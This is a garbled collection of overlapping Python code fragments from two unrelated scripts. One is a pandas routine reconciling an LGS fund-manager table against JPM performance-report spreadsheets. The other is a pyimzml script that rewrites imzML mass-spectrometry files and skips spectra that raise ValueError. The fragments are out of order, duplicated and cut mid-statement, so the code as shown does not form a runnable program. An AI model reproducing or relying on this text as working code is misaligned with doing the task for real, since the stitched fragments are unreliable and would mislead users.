columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing", "np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers", "# Creates set containing fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager']))", "'B:O', 'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet", "Years', '84_Return': '7 Years' } # Performs the deviant check df_deviations = pd.DataFrame()", "len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation)", "currently open accounts. 
df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set", ") df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column", "# df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the market", "'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet == 'Page 8':", "2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName',", "'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' }", "df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm", "during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ',", "{np.nan} # Prints open accounts that are missing from LGS. 
print('\\nMissing completely from", "'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers that", "sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market", "ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True)", "0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i],", "Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing", "# left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' #", "columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm,", "} # Performs the deviant check df_deviations = pd.DataFrame() deviants = [] columns", "else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing =", "print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed", "are missing from LGS. 
print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts;", "Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames =", "# Creates set containing fund managers that are open accounts but are not", "as dt import numpy as np import pandas as pd # START USER", "and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess", "Merges the market values from JPM IAP with JPM HTS # df_jpm_main =", "results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing)", "df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that", "df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy", "Value']] # # # Merges the market values from JPM IAP with JPM", "[] total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for", "(pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count +=", "total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers", "1 # Fixes the column names columns_fix = [] for column in columns:", "managers that are open accounts but are not checked. 
df_lgs_missing_completely = lgs_open_set -", "LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance", "df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5 NOF':", "columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if", "Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) +", "Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel(", "Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks", "'Date', 'Market Value']] # # # Merges the market values from JPM IAP", "the column names columns_fix = [] for column in columns: if column ==", "pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0':", "Years' } # Performs the deviant check df_deviations = pd.DataFrame() deviants = []", "pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict", "are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'})", "in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if", "LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include", "'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm", "completely missed. 
# Creates set containing fund managers that are currently open accounts.", "HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager',", "deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count", "lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1", "= df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM", "columns: if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants", "', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for", "for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns,", "with JPM HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm,", "header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap,", "ReportName', } ) if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed:", "[] lgs_missing = [] total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn", "df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates", "= pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 )", "containing fund managers that have been checked. 
lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set", "'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7", "3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7", "accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check from JPM',", "accounts that are missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import", "= pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm =", "column in columns: if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager']", "the deviant check df_deviations = pd.DataFrame() deviants = [] columns = [] deviations", "START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath", "pd.DataFrame() deviants = [] columns = [] deviations = [] jpm_missing = []", "'Market Value']] # # # Merges the market values from JPM IAP with", "df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm", "'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm", "jpmcolumn)) total_count += 1 # Fixes the column names columns_fix = [] for", "'36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years' } # Performs the", "set containing fund managers that are currently open accounts. 
df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True)", "df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies.", "print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count:", "- df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if", "have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that", "the market values from JPM IAP with JPM HTS # df_jpm_main = pd\\", "lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation", "that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers", "'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy", "pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) #", "containing strategies. 
df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set", "df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2':", "total_count += 1 # Fixes the column names columns_fix = [] for column", "jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx,", "report_date = dt.datetime(2020, 5, 31) # End USER INPUT # Reads LGS table", "to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1", "= df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] =", "if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM", "names columns_fix = [] for column in columns: if column == 'Market Value_y':", "int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account", "# Fixes the column names columns_fix = [] for column in columns: if", "removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return']", "jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i]", "df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = {", "', accuracy, '%') # Checks for managers that have been completely 
missed. #", "- lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts that", "Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges", "Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap", "# sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]),", "and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count", "USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath =", "df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm =", "Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31) # End USER INPUT", "= deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column'])", "# Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market", "df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 #", "return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer'", "df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads", "from LGS. 
print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID;", "remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm =", "managers that have been completely missed. # Creates set containing fund managers that", "deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and", "= 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation", "lgs_missing = [] total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn in", "# # Merges the market values from JPM IAP with JPM HTS #", "open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set =", "from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select", "jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: #", "8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel(", "df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them", "sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx =", "# df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'],", "'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ # .sort_values(['Manager', 'Date'])\\ # .reset_index(drop=True)", "lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts that are missing from", "- {np.nan} # Prints open 
accounts that are missing from LGS. print('\\nMissing completely" ]
[ "import ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os from", "ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file", "writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities =", "print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in", "as np import os from tqdm import tqdm ## SCRIPT 1B: Run this", "intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ ==", "= os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done", "this script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path", "= ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx,", "--\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading", "a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML", "with imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data file", "encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing", "if SCRIPT 1A encounters a ValueError. 
def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path,", "mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__", "in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords)", "def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n')", "as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities", "data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML and ibd", "ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os from tqdm", "import numpy as np import os from tqdm import tqdm ## SCRIPT 1B:", "Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates,", "= 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML and ibd files", "import tqdm ## SCRIPT 1B: Run this script if SCRIPT 1A encounters a", "import os from tqdm import tqdm ## SCRIPT 1B: Run this script if", "imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('--", "os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n')", "--\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer:", "imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with", "enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) 
writer.addSpectrum(mzs, intensities, coords) except", "coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' #", "'__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML and", "script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path =", "file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as", "imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data file name", "imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p", "from pyimzml.ImzMLParser import ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import", "imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p =", "directory with imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data", "desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError:", "pyimzml.ImzMLParser import ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os", "pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os from tqdm import tqdm", "and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data file name imzML_fix(data_path,", "import ImzMLWriter import numpy as np import os from tqdm import tqdm ##", "## SCRIPT 1B: Run this script if SCRIPT 1A encounters a ValueError. 
def", "np import os from tqdm import tqdm ## SCRIPT 1B: Run this script", "Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'),", "polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs,", "Run this script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'):", "# Provide path to data directory with imzML and ibd files imzml_file =", "numpy as np import os from tqdm import tqdm ## SCRIPT 1B: Run", "os from tqdm import tqdm ## SCRIPT 1B: Run this script if SCRIPT", "'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML and ibd files imzml_file", "1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('--", "writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path =", "SCRIPT 1A encounters a ValueError. 
def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file)", "print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path,", "Provide path to data directory with imzML and ibd files imzml_file = 'image_data_file.imzML'", "if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory", "from tqdm import tqdm ## SCRIPT 1B: Run this script if SCRIPT 1A", "path to data directory with imzML and ibd files imzml_file = 'image_data_file.imzML' #", "__name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with", "tqdm ## SCRIPT 1B: Run this script if SCRIPT 1A encounters a ValueError.", "idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs,", "ImzMLWriter import numpy as np import os from tqdm import tqdm ## SCRIPT", "writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to", "f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try:", "np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data", "intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data'", "ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path", "for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx)", "from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os from tqdm import", "1B: Run this script if SCRIPT 1A encounters a ValueError. 
def imzML_fix(data_path, imzml_file,", "SCRIPT 1B: Run this script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path,", "p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path", "data directory with imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML", "imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str)", "to data directory with imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide", "except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide", "MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0),", "ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')):", "tqdm import tqdm ## SCRIPT 1B: Run this script if SCRIPT 1A encounters", "ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data file name imzML_fix(data_path, imzml_file)", "== '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML", "<reponame>luketrichardson/RKMD-MS-Imaging-Annotation-and-Filtering from pyimzml.ImzMLParser import ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np", "with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS", "polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path)", "p = ImzMLParser(imzml_path) print('-- Done --\\n') with 
